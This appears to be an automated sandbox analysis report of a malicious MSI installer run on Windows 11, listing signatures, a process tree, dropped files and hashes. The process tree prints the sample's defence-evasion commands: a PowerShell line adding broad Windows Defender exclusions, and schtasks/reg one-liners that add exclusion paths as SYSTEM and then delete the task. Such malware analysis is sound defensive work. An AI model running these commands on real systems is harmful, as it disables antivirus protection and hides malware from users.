Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    04/08/2026, 03:38

General

  • Target
    install_b6j010.msi
  • Size 5.4MB
  • Sample260804-d67gfacd88
  • SHA256 f137e75a9459dd1f8e76d5d43bc7e45b05a1447d68997ab9e232831335acd470
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 6 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 5 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 5 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_b6j010.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:4608
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4848
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2516
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 2CA6DD9F93B3833B0B29D68E02668668 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:5812
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:3472
  • C:\Users\Public\B7INbx\bxoN4Y.exe
    "C:\Users\Public\B7INbx\bxoN4Y.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:3440
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\B7INbx\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:3164
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\B7INbx\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4404
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:5648
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:2380
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:3540
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4672
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:4128
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:4852
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3888
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4584
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:240
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:5612
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:592
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:796
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:1096
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:2892
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:2788
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2900
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:5116
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:3528
                      • C:\Windows\system32\cmd.exe
                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\B7INbx" /t REG_DWORD /d 0 /f
                        1⤵
                        • Executes a command shell one-liner
                        • Suspicious use of WriteProcessMemory
                        PID:1952
                        • C:\Windows\System32\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\B7INbx" /t REG_DWORD /d 0 /f
                          2⤵
                          • Windows security bypass
                          PID:3048
                      • C:\Windows\system32\cmd.exe
                        cmd.exe
                        1⤵
                          PID:956
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:2248
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:5664
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:5168
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:568
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:2884
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:2408
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:5840
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:1732

                        Network

                              MITRE ATT&CK Enterprise v16

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              e592031.rbs

                              • Path C:\Config.Msi\e592031.rbs
                              • Size 7KB
                              • SHA256 dfed02fd02201fdfd69a3ea0b0d1fc2918758ccebcbe27d4a7a304e14bff3f95
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              UxEnhance64.dll

                              • Path C:\Users\Public\B7INbx\UxEnhance64.dll
                              • Size 3.1MB
                              • SHA256 b127dc6aa06f67b8339613e6e7471acfd48e7687069d0db84cf8d8ede5f17c43
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              adoresd.dat

                              • Path C:\Users\Public\B7INbx\adoresd.dat
                              • Size 4.7MB
                              • SHA256 04199afc2741a9b96b911feb7b383aa3a4773bbd873190eefd35dc6de24a06df
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              bxoN4Y.exe

                              • Path C:\Users\Public\B7INbx\bxoN4Y.exe
                              • Size 135KB
                              • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              msadox.tb

                              • Path C:\Users\Public\B7INbx\msadox.tb
                              • Size 8KB
                              • SHA256 31ce2f4c46b36501482de6bba38bacdb27356e8c12959b20e1072dc1abdecfe8
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              MSI26AA.tmp

                              • Path C:\Windows\Installer\MSI26AA.tmp
                              • Size 5.3MB
                              • SHA256 1a4f8a2bf676e661da58a8a93557915da3342d585fccee8e6156822a09f2e95f
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              e592030.msi

                              • Path C:\Windows\Installer\e592030.msi
                              • Size 5.4MB
                              • SHA256 f137e75a9459dd1f8e76d5d43bc7e45b05a1447d68997ab9e232831335acd470
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              metadata-2

                              • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                              • Size 26.1MB
                              • SHA256 f9557cf99ad7b1f883b6139762f3b73d4e72f5058daed1604ceb1f038cb0e884
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              {71e01a57-7667-40d8-a8a6-577e5e4578dc}_OnDiskSnapshotProp

                              • Path \??\Volume{c61fa831-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{71e01a57-7667-40d8-a8a6-577e5e4578dc}_OnDiskSnapshotProp
                              • Size 6KB
                              • SHA256 4d067ebea8bf2d6d1dcc307f92ff5b4ad818610316b092b9e421e86299dd0d95
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              memory/1936-71-0x00007FFB8D7A0000-0x00007FFB8D7A2000-memory.dmp

                              memory/1936-93-0x0000021DD88A0000-0x0000021DD892A000-memory.dmp

                              memory/1936-104-0x0000021DD94A0000-0x0000021DD951C000-memory.dmp

                              memory/1936-101-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-63-0x00007FFB8D790000-0x00007FFB8D792000-memory.dmp

                              memory/1936-64-0x00007FFB69A00000-0x00007FFB69F1E000-memory.dmp

                              memory/1936-97-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-92-0x0000021DD88A0000-0x0000021DD892A000-memory.dmp

                              memory/1936-69-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-95-0x0000021DD88A0000-0x0000021DD892A000-memory.dmp

                              memory/1936-72-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-76-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-77-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-78-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-79-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-84-0x0000021DD7F70000-0x0000021DD8801000-memory.dmp

                              memory/1936-90-0x0000021DD7510000-0x0000021DD755E000-memory.dmp

                              memory/1936-94-0x0000021DD88A0000-0x0000021DD892A000-memory.dmp

                              memory/3440-108-0x000001C6F3250000-0x000001C6F3272000-memory.dmp

                              memory/3440-112-0x000001C6F32A0000-0x000001C6F32BE000-memory.dmp

                              memory/3440-113-0x000001C6F3500000-0x000001C6F35B2000-memory.dmp

                              memory/3440-114-0x000001C6F32C0000-0x000001C6F32CA000-memory.dmp

                              memory/4848-10-0x0000027C03600000-0x0000027C036CD000-memory.dmp

                              memory/4848-55-0x0000027C03600000-0x0000027C036CD000-memory.dmp

                              memory/5812-13-0x00007FFB8D790000-0x00007FFB8D792000-memory.dmp

                              memory/5812-14-0x00007FFB698F0000-0x00007FFB69F1F000-memory.dmp

                              memory/5812-17-0x00007FFB75590000-0x00007FFB755A2000-memory.dmp

                              memory/5812-45-0x00007FFB75590000-0x00007FFB755A2000-memory.dmp